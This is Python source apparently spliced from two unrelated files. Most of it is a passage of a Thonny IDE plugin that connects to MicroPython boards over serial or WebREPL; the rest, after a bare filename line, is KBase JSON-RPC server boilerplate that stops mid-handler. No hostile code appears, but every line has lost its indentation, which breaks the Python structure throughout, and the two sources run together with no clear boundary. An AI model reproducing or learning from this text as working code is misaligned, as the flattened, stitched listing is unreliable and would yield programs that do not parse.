# not complete yet
self._connection.unread(new_bytes)
return None
elif term_loc == len(new_bytes) - len(terminator):
# This terminator ends the bytes
# The normal, completed case
assert self._connection.incoming_is_empty()
msg_bytes = new_bytes[2 : -len(terminator)]
self.idle = True
return self._parse_message(msg_bytes)
else:
# There is something following the terminator
# I guess this can be caused by interrupt
# This means the message is stale
logging.info(
"disregarding out of date Thonny message: %r", new_bytes
)
# Unread following stuff
self._connection.unread(new_bytes[term_loc + len(terminator) :])
else:
# exception block
# this is followed by EOT and can/should be read in one piece
next_eot_loc = new_bytes.find(EOT, 1)
if next_eot_loc == -1:
# the block isn't complete yet
self._connection.unread(new_bytes)
return None
else:
# block is complete
block_bytes = new_bytes[1:next_eot_loc]
leftover_bytes = new_bytes[next_eot_loc:] # should be EOT + >
self._connection.unread(leftover_bytes)
if len(block_bytes) > 0:
# non-empty exception block
return BackendEvent(
event_type="ProgramOutput",
stream_name="stderr",
data=self.transform_output(
block_bytes.decode("utf-8", "replace"), "stderr"
),
)
else:
return None
return None
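    # Editorial note: "Thonny messages" are produced on the device by printing
    # '\x04\x02' followed by the repr() of a dict (see the scripts sent by the
    # _cmd_* methods above); _parse_message() below rebuilds the dict with
    # ast.literal_eval and instantiates the class named by its 'message_class'
    # key.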
def _parse_message(self, msg_bytes):
try:
msg_str = msg_bytes.decode("utf-8").strip()
except:
traceback.print_exc()
msg_str = msg_bytes.decode("utf-8", "replace").strip()
try:
msg = ast.literal_eval(msg_str)
except:
logging.getLogger("thonny").error("Could not eval %r", msg_str)
raise
assert isinstance(msg, dict)
class_name = msg["message_class"]
del msg["message_class"]
assert class_name in globals()
class_ = globals()[class_name]
return class_(**msg)
def _read_output_message(self, out_bytes, complete) -> Optional[BackendEvent]:
if complete:
out_str = out_bytes.decode("utf-8", "replace")
else:
# out_bytes may end with a partial utf-8 char
while True:
try:
out_str = out_bytes.decode("utf-8", "replace")
break
except UnicodeDecodeError:
# unread last byte and try again
self._connection.unread(out_bytes[-1:])
out_bytes = out_bytes[:-1]
if len(out_str) == 0:
return None
else:
transformed = self.transform_output(out_str, "stdout")
return BackendEvent(
event_type="ProgramOutput", stream_name="stdout", data=transformed
)
def transform_output(self, s, stream_name):
if os.name != "nt":
            # the device sends CRLF line endings; use plain LF on non-Windows hosts
s = s.replace("\r\n", "\n")
# replace "<stdin>" in error messages with script name
if (
stream_name == "stderr"
and self._last_toplevel_command
and self._last_toplevel_command.name in ["Run", "run"]
and hasattr(self._last_toplevel_command, "script_path")
):
s = s.replace('"<stdin>"', '"%s"' % self._last_toplevel_command.script_path)
# TODO: get rid of raw prompts (may occur after soft reboot)
        # TODO: move it to CircuitPython subclass
return s.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press CTRL-C to enter the REPL. Use CTRL-D to reload.",
)
def _get_path_prefix(self):
if not self._supports_directories():
return ""
elif "LoBo" in self._welcome_text or "WiPy with ESP32" in self._welcome_text:
return "/flash/"
else:
return "/"
def get_default_directory(self):
prefix = self._get_path_prefix()
if prefix.endswith("/") and prefix != "/":
return prefix[:-1]
else:
return prefix
def _get_main_script_path(self):
return self._get_path_prefix() + "main.py"
def _get_boot_script_path(self):
return self._get_path_prefix() + "boot.py"
def _get_script_path(self):
local_path = (
get_workbench().get_editor_notebook().get_current_editor().save_file(False)
)
assert os.path.isfile(local_path), "File not found: %s" % local_path
return self._get_path_prefix() + os.path.basename(local_path)
def transform_message(self, msg):
if msg is None:
return None
if isinstance(msg.get("value_info", None), tuple):
msg["value_info"] = common.ValueInfo(*msg["value_info"])
if (
getattr(msg, "command_name", None) == "shell_autocomplete"
and "completions" not in msg
):
names = msg["names"]
match = msg["match"]
del msg["names"]
matches = [
{"name": n, "complete": n[len(match) :]}
for n in names
if n.startswith(match) and not n.startswith("__")
]
msg["completions"] = matches
return msg
else:
return msg
def _enter_raw_repl(self, strict):
if strict:
assert self._connection.buffers_are_empty()
discarded_data = b""
for delay in [0.01, 0.05, 0.1, 0.5]:
self._connection.write(b"\x03")
sleep(delay / 3)
self._connection.write(b"\x01")
sleep(delay)
# Consume the raw repl introduction + prompt
discarded_data += self._connection.read_all()
if discarded_data.endswith(b"\r\n>"):
self.idle = True
return ToplevelResponse()
self._send_error_to_shell(
"Couldn't connect to the raw REPL. Serial output: " + str(discarded_data)
)
self.idle = False
return None
def _send_error_to_shell(self, message_text):
self._send_text_to_shell(message_text, "stderr")
def _send_text_to_shell(self, message_text, stream_name):
if not message_text.endswith("\n"):
message_text += "\n"
self._non_serial_msg_queue.put(
BackendEvent(
event_type="ProgramOutput", stream_name=stream_name, data=message_text
)
)
def _get_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._get_api_stubs_path(), "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
def _get_api_stubs_path(self):
import inspect
return os.path.join(
os.path.dirname(inspect.getfile(self.__class__)), "api_stubs"
)
@property
def firmware_filetypes(self):
return [("all files", ".*")]
@property
def micropython_upload_enabled(self):
return self._connection is not None
def select_and_upload_micropython(self):
firmware_path = askopenfilename(
filetypes=self.firmware_filetypes,
initialdir=get_workbench().get_option("run.working_directory"),
)
if firmware_path:
self.upload_micropython(firmware_path)
def upload_micropython(self, firmware_path):
cmd = self.construct_firmware_upload_command(firmware_path)
self.disconnect()
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
dlg = SubprocessDialog(
get_workbench(),
proc,
"Uploading firmware",
autoclose=False,
conclusion="Done.\nNB! If opening REPL fails on first trial\nthen wait a second and try again.",
)
show_dialog(dlg)
def construct_firmware_upload_command(self, firmware_path):
raise NotImplementedError()
@property
def known_usb_vids_pids(self):
"""Return set of pairs of USB device VID, PID"""
return set()
@property
def known_port_descriptions(self):
return set()
def get_node_label(self):
if "CircuitPython" in self._welcome_text:
return "CircuitPython device"
elif "micro:bit" in self._welcome_text.lower():
return "micro:bit"
else:
return "MicroPython device"
def has_separate_files(self):
return self._connection is not None
def can_do_file_operations(self):
return self.idle
class MicroPythonConfigPage(BackendDetailsConfigPage):
backend_name = None # Will be overwritten on Workbench.add_backend
def __init__(self, master):
super().__init__(master)
        intro_text = (
            "Connect your device to the computer and select the corresponding port below (look for your device name, \n"
            + '"USB Serial" or "UART"). If you can\'t find it, you may need to install the proper USB driver first.'
)
if self.allow_webrepl:
intro_text = (
"Connecting via USB cable:\n"
+ intro_text
+ "\n\n"
+ "Connecting via WebREPL protocol:\n"
+ "If your device supports WebREPL, first connect via serial, make sure WebREPL is enabled\n"
                + "(import webrepl_setup), connect your computer and device to the same network and select < WebREPL > below"
)
intro_label = ttk.Label(self, text=intro_text)
intro_label.grid(row=0, column=0, sticky="nw")
driver_url = self._get_usb_driver_url()
if driver_url:
driver_url_label = create_url_label(self, driver_url)
driver_url_label.grid(row=1, column=0, sticky="nw")
port_label = ttk.Label(
self, text="Port or WebREPL" if self.allow_webrepl else "Port"
)
port_label.grid(row=3, column=0, sticky="nw", pady=(10, 0))
self._ports_by_desc = {
p.description
if p.device in p.description
else p.description + " (" + p.device + ")": p.device
for p in list_serial_ports()
}
self._ports_by_desc["< Try to detect port automatically >"] = "auto"
self._ports_by_desc["< None / don't connect at all >"] = None
self._WEBREPL_OPTION_DESC = "< WebREPL >"
if self.allow_webrepl:
self._ports_by_desc[self._WEBREPL_OPTION_DESC] = "webrepl"
def port_order(p):
_, name = p
if name is None:
return ""
elif name.startswith("COM") and len(name) == 4:
# Make one-digit COM ports go before COM10
return name.replace("COM", "COM0")
else:
return name
# order by port, auto first
port_descriptions = [
key for key, _ in sorted(self._ports_by_desc.items(), key=port_order)
]
self._port_desc_variable = create_string_var(
self.get_current_port_desc(), self._on_change_port
)
self._port_combo = ttk.Combobox(
self,
exportselection=False,
textvariable=self._port_desc_variable,
values=port_descriptions,
)
self._port_combo.state(["!disabled", "readonly"])
self._port_combo.grid(row=4, column=0, sticky="new")
self.columnconfigure(0, weight=1)
if self.allow_webrepl:
self._init_webrepl_frame()
self._on_change_port()
def _init_webrepl_frame(self):
self._webrepl_frame = ttk.Frame(self)
self._webrepl_url_var = create_string_var(DEFAULT_WEBREPL_URL)
url_label = ttk.Label(
self._webrepl_frame, text="URL (eg. %s)" % DEFAULT_WEBREPL_URL
)
url_label.grid(row=0, column=0, sticky="nw", pady=(10, 0))
url_entry = ttk.Entry(
self._webrepl_frame, textvariable=self._webrepl_url_var, width=24
)
url_entry.grid(row=1, column=0, sticky="nw")
self._webrepl_password_var = create_string_var(
get_workbench().get_option(self.backend_name + ".webrepl_password")
)
pw_label = ttk.Label(
self._webrepl_frame,
text="Password (the one specified with `import webrepl_setup`)",
)
pw_label.grid(row=2, column=0, sticky="nw", pady=(10, 0))
pw_entry = ttk.Entry(
self._webrepl_frame, textvariable=self._webrepl_password_var, width=9
)
pw_entry.grid(row=3, column=0, sticky="nw")
def get_current_port_desc(self):
name = get_workbench().get_option(self.backend_name + ".port")
for desc in self._ports_by_desc:
if self._ports_by_desc[desc] == name:
return desc
return ""
def is_modified(self):
return (
self._port_desc_variable.modified # pylint: disable=no-member
or self.allow_webrepl
and self._webrepl_password_var.modified # pylint: disable=no-member
or self.allow_webrepl
and self._webrepl_url_var.modified
) # pylint: disable=no-member
def should_restart(self):
return self.is_modified()
def apply(self):
if not self.is_modified():
return
else:
port_desc = self._port_desc_variable.get()
port_name = self._ports_by_desc[port_desc]
get_workbench().set_option(self.backend_name + ".port", port_name)
get_workbench().set_option(
self.backend_name + ".webrepl_url", self._webrepl_url_var.get()
)
get_workbench().set_option(
self.backend_name + ".webrepl_password",
self._webrepl_password_var.get(),
)
def _on_change_port(self, *args):
if self._port_desc_variable.get() == self._WEBREPL_OPTION_DESC:
self._webrepl_frame.grid(row=6, column=0, sticky="nwe")
elif self.allow_webrepl and self._webrepl_frame.winfo_ismapped():
self._webrepl_frame.grid_forget()
def _get_usb_driver_url(self):
return None
@property
def allow_webrepl(self):
return False
class GenericMicroPythonProxy(MicroPythonProxy):
@property
def known_usb_vids_pids(self):
"""Return set of pairs of USB device (VID, PID)"""
return {
# Generic MicroPython Board, see http://pid.codes/org/MicroPython/
(0x1209, 0xADDA)
}
class GenericMicroPythonConfigPage(MicroPythonConfigPage):
@property
def allow_webrepl(self):
return True
class Connection:
"""Utility class for using Serial or WebSocket connection
    Uses a background thread to read from the source as soon as possible,
    to avoid loss of data (because of buffer overflow or the device
    discarding unread data).
    Allows writing with a delay after each block of n bytes.
Allows unreading data.
"""
def __init__(self):
self._read_queue = Queue() # populated by reader thread
self._read_buffer = bytearray() # used for unreading and postponing bytes
self.num_bytes_received = 0
self._error = None
def read(self, size, timeout=1):
if timeout == 0:
raise TimeoutError()
timer = TimeHelper(timeout)
while len(self._read_buffer) < size:
self._check_for_error()
try:
self._read_buffer.extend(self._read_queue.get(True, timer.time_left))
except queue.Empty:
raise TimeoutError(
"Reaction timeout. Bytes read: %s" % self._read_buffer
)
try:
data = self._read_buffer[:size]
return data
finally:
del self._read_buffer[:size]
def read_until(self, terminators, timeout=2):
if timeout == 0:
raise TimeoutError()
timer = TimeHelper(timeout)
if not isinstance(terminators, (set, list, tuple)):
terminators = [terminators]
terminator = None
while True:
self._check_for_error()
found = False
for terminator in terminators:
if terminator in self._read_buffer:
found = True
break
if found:
break
try:
data = self._read_queue.get(True, timer.time_left)
assert len(data) > 0
self._read_buffer.extend(data)
except queue.Empty:
raise TimeoutError(
"Reaction timeout. Bytes read: %s" % self._read_buffer
)
assert terminator is not None
size = self._read_buffer.index(terminator) + len(terminator)
try:
data = self._read_buffer[:size]
return data
finally:
del self._read_buffer[:size]
def read_all(self):
while not self._read_queue.empty():
self._read_buffer.extend(self._read_queue.get(True))
if len(self._read_buffer) == 0:
self._check_for_error()
try:
return self._read_buffer
finally:
self._read_buffer = bytearray()
    def _check_for_error(self):
        if self._error:
            # propagate the reader thread's error message
            raise SerialException(self._error)
def unread(self, data):
self._read_buffer = data + self._read_buffer
def write(self, data, block_size=32, delay=0.01):
raise NotImplementedError()
def _log_data(self, data):
print(
data.decode("Latin-1")
.replace("\r\n", "\n")
.replace("\x01", "①")
.replace("\x02", "②")
.replace("\x03", "③")
.replace("\x04", "④"),
end="",
)
def incoming_is_empty(self):
return self._read_queue.empty() and len(self._read_buffer) == 0
def outgoing_is_empty(self):
return True
def buffers_are_empty(self):
return self.incoming_is_empty() and self.outgoing_is_empty()
def reset_input_buffer(self):
return self.read_all()
def reset_output_buffer(self):
pass
def close(self):
raise NotImplementedError()
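# Illustrative sketch (an assumption, not part of the original plugin): the
# smallest useful Connection subclass, handy for exercising read_until() and
# unread() without real hardware. Kept as a comment so module behaviour is
# unchanged; the name _LoopbackConnection is hypothetical.
#
#     class _LoopbackConnection(Connection):
#         def write(self, data, block_size=32, delay=0.01):
#             self._read_queue.put(bytes(data))
#             return len(data)
#
#         def close(self):
#             pass
#
#     conn = _LoopbackConnection()
#     conn.write(b"hello\x04>")
#     conn.read_until(b"\x04>")   # -> b"hello\x04>" (terminator included)
#     conn.unread(b"rest")        # pushed back for the next read()/read_all()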
class SerialConnection(Connection):
def __init__(self, port, baudrate):
super().__init__()
self._serial = serial.Serial(port, baudrate=baudrate, timeout=None)
self._reading_thread = threading.Thread(target=self._listen_serial, daemon=True)
self._reading_thread.start()
def write(self, data, block_size=32, delay=0.01):
for i in range(0, len(data), block_size):
block = data[i : i + block_size]
# self._log_data(b"[" + block + b"]")
size = self._serial.write(block)
assert size == len(block)
time.sleep(delay)
return len(data)
def _listen_serial(self):
"NB! works in background thread"
try:
while True:
b = self._serial.read(1) # To avoid busy loop
if len(b) == 0:
self._error = "EOF"
# print("LISTEN EOFFFFFFFFFF")
break
data = b + self._serial.read_all()
self.num_bytes_received += len(data)
self._read_queue.put(data)
# self._log_data(data)
except SerialException as e:
logging.exception("Error while reading from serial")
            self._error = "Serial reading error: %s" % e
def incoming_is_empty(self):
return self._serial.in_waiting == 0 and super().incoming_is_empty()
def outgoing_is_empty(self):
return self._serial.out_waiting == 0
def reset_output_buffer(self):
self._serial.reset_output_buffer()
def close(self):
if self._serial is not None:
try:
self._serial.cancel_read()
self._reading_thread.join()
finally:
try:
self._serial.close()
self._serial = None
except Exception:
logging.exception("Couldn't close serial")
class WebReplConnection(Connection):
def __init__(self, url, password):
super().__init__()
self._url = url
self._password = password
# Some tricks are needed to use async library in sync program
# use thread-safe queues to communicate with async world in another thread
self._write_queue = Queue()
self._connection_result = Queue()
self._ws_thread = threading.Thread(target=self._wrap_ws_main, daemon=True)
self._ws_thread.start()
# Wait until connection was made
res = self._connection_result.get()
if res != "OK":
raise res
def _wrap_ws_main(self):
import asyncio
loop = asyncio.new_event_loop()
loop.set_debug(True)
loop.run_until_complete(self._ws_main())
async def _ws_main(self):
import asyncio
try:
await self._ws_connect()
except Exception as e:
self._connection_result.put_nowait(e)
return
self._connection_result.put_nowait("OK")
await asyncio.gather(self._ws_keep_reading(), self._ws_keep_writing())
async def _ws_connect(self):
import asyncio
import websockets
self._ws = await asyncio.wait_for(
websockets.connect(self._url, ping_interval=None), 3
)
print("GOT WS", self._ws)
# read password prompt and send password
read_chars = ""
while read_chars != "Password: ":
print("prelude", read_chars)
ch = await self._ws.recv()
print("GOT", ch)
read_chars += ch
print("sending password")
await self._ws.send(self._password + "\n")
print("sent password")
async def _ws_keep_reading(self):
while True:
data = (await self._ws.recv()).encode("UTF-8")
print("Read:", repr(data))
if len(data) == 0:
self._error = "EOF"
break
self.num_bytes_received += len(data)
self._read_queue.put(data, block=False)
async def _ws_keep_writing(self):
import asyncio
while True:
while not self._write_queue.empty():
data = self._write_queue.get(block=False).decode("UTF-8")
print("Wrote:", repr(data))
await self._ws.send(data)
# Allow reading loop to progress
await asyncio.sleep(0.01)
def write(self, data, block_size=32, delay=0.01):
self._write_queue.put_nowait(data)
async def _async_close(self):
await self._ws.close()
def close(self):
"""
import asyncio
asyncio.get_event_loop().run_until_complete(self.async_close())
"""
class TimeHelper:
def __init__(self, time_allowed):
self.start_time = time.time()
self.time_allowed = time_allowed
@property
def time_spent(self):
return time.time() - self.start_time
@property
def time_left(self):
return max(self.time_allowed - self.time_spent, 0)
def parse_api_information(file_path):
with tokenize.open(file_path) as fp:
source = fp.read()
tree = ast.parse(source)
defs = {}
# TODO: read also docstrings ?
for toplevel_item in tree.body:
if isinstance(toplevel_item, ast.ClassDef):
class_name = toplevel_item.name
member_names = []
for item in toplevel_item.body:
if isinstance(item, ast.FunctionDef):
member_names.append(item.name)
elif isinstance(item, ast.Assign):
# TODO: check Python 3.4
"TODO: item.targets[0].id"
defs[class_name] = member_names
return defs
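# Illustrative note (editorial): for a stub file containing
#
#     class Pin:
#         def on(self): pass
#         def off(self): pass
#
# parse_api_information() returns {"Pin": ["on", "off"]}; mappings of this
# shape are what MicroPythonProxy.filter_completions() consults when hiding
# CPython-only names.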
def list_serial_ports():
# serial.tools.list_ports.comports() can be too slow
# because os.path.islink can be too slow (https://github.com/pyserial/pyserial/pull/303)
    # Workaround: temporarily patch os.path.islink
try:
old_islink = os.path.islink
if platform.system() == "Windows":
os.path.islink = lambda _: False
return list(serial.tools.list_ports.comports())
finally:
os.path.islink = old_islink
def add_micropython_backend(name, proxy_class, description, config_page):
get_workbench().set_default(name + ".port", "auto")
get_workbench().set_default(name + ".webrepl_url", DEFAULT_WEBREPL_URL)
get_workbench().set_default(name + ".webrepl_password", "")
get_workbench().add_backend(name, proxy_class, description, config_page)
def load_plugin():
add_micropython_backend(
"GenericMicroPython",
GenericMicroPythonProxy,
"MicroPython on a generic device",
GenericMicroPythonConfigPage,
)
def _upload_as(target_provider_method):
source_path = (
get_workbench().get_editor_notebook().get_current_editor().save_file(False)
)
if source_path is None:
return
proxy = get_runner().get_backend_proxy()
assert isinstance(proxy, MicroPythonProxy)
if os.path.isabs(source_path):
source_path = os.path.relpath(source_path, get_workbench().get_cwd())
target = getattr(proxy, target_provider_method)()
get_shell().submit_magic_command(["%upload", source_path, target])
def _cat(source_provider_method):
proxy = get_runner().get_backend_proxy()
assert isinstance(proxy, MicroPythonProxy)
source = getattr(proxy, source_provider_method)()
get_shell().submit_magic_command(["%cat", source])
def _upload_as_main_script():
_upload_as("_get_main_script_path")
def _upload_as_boot_script():
_upload_as("_get_boot_script_path")
def _upload_script():
_upload_as("_get_script_path")
def _cat_main_script():
_cat("_get_main_script_path")
def _cat_boot_script():
_cat("_get_boot_script_path")
def soft_reboot():
proxy = get_runner().get_backend_proxy()
if hasattr(proxy, "_soft_reboot_and_run_main"):
return proxy._soft_reboot_and_run_main()
return None
def soft_reboot_enabled():
proxy = get_runner().get_backend_proxy()
return (
proxy
and proxy.is_functional()
and hasattr(proxy, "_soft_reboot_and_run_main")
)
def disconnect():
proxy = get_runner().get_backend_proxy()
assert hasattr(proxy, "disconnect")
proxy.disconnect()
def disconnect_enabled():
proxy = get_runner().get_backend_proxy()
return hasattr(proxy, "disconnect")
def file_commands_enabled():
proxy = get_runner().get_backend_proxy()
return (
isinstance(proxy, MicroPythonProxy)
and get_workbench().get_editor_notebook().get_current_editor() is not None
and get_runner().is_waiting_toplevel_command()
)
def select_device():
get_workbench().show_options("Interpreter")
get_workbench().add_command(
"selectdevice", "device", "Select device", select_device, group=1
)
get_workbench().add_command(
"softreboot",
"device",
"Soft reboot",
soft_reboot,
soft_reboot_enabled,
group=100,
default_sequence="<Control-d>",
extra_sequences=["<<CtrlDInText>>"],
)
get_workbench().add_command(
"uploadmainscript",
"device",
"Upload current script as main script",
_upload_as_main_script,
tester=file_commands_enabled,
default_sequence="<Control-u>",
group=20,
)
get_workbench().add_command(
"uploadbootscript",
"device",
"Upload current script as boot script",
_upload_as_boot_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"uploadscript",
"device",
"Upload current script with current name",
_upload_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"catmainscript",
"device",
"Show device's main script",
_cat_main_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"catbootscript",
"device",
"Show device's boot script",
_cat_boot_script,
tester=file_commands_enabled,
group=20,
)
get_workbench().add_command(
"disconnectserial",
"device",
"Close serial connection",
disconnect,
disconnect_enabled,
group=100,
)
kb_transytServer.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kb_transyt.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_transyt'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_transyt.kb_transytImpl import kb_transyt # noqa @IgnorePep8
impl_kb_transyt = kb_transyt(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
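    # Illustrative note (editorial): call_py() accepts either a single request
    # dict, e.g.
    #     {"version": "1.1", "method": "kb_transyt.status", "params": [{}], "id": 1}
    # or a list of such dicts (a batch). Requests whose id is None are treated
    # as notifications and produce no response entry.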
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
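# Editorial note: setting dont_trust_x_ip_headers to 'true' in the deployment
# config makes getIPAddress() ignore X-Forwarded-For / X-Real-IP and fall back
# to REMOTE_ADDR.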
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_transyt'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_transyt.run_transyt,
name='kb_transyt.run_transyt',
types=[dict])
self.method_authentication['kb_transyt.run_transyt'] = 'required' # noqa
self.rpc_service.add(impl_kb_transyt.status,
name='kb_transyt.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_transyt ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
